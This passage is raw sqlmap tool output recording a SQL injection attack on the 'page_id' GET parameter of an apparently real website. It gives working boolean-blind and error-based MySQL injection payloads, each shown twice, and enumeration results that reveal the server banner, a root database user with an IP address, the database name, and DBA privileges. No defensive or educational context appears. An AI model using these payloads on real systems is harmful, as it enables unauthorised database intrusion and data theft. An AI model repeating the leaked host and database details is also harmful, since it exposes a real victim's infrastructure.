    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

sqlmap IDENTIFIED the following injection points WITH a total OF 0 HTTP(s) requests:
---
Place: GET
Parameter: page_id
    TYPE: boolean-based blind
    Title: AND boolean-based blind - WHERE OR HAVING clause
    Payload: page_id=28167956 AND 1228=1228

    TYPE: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE OR HAVING clause
    Payload: page_id=28167956 AND (SELECT 3412 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,99,114,58),(SELECT (CASE WHEN (3412=3412) THEN 1 ELSE 0 END)),CHAR(58,105,115,121,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

banner:    '5.0.45-log'

CURRENT USER:    'root@208.43.165.226'

CURRENT DATABASE:    'orcataco_bumperstic'

CURRENT USER IS DBA:    'True'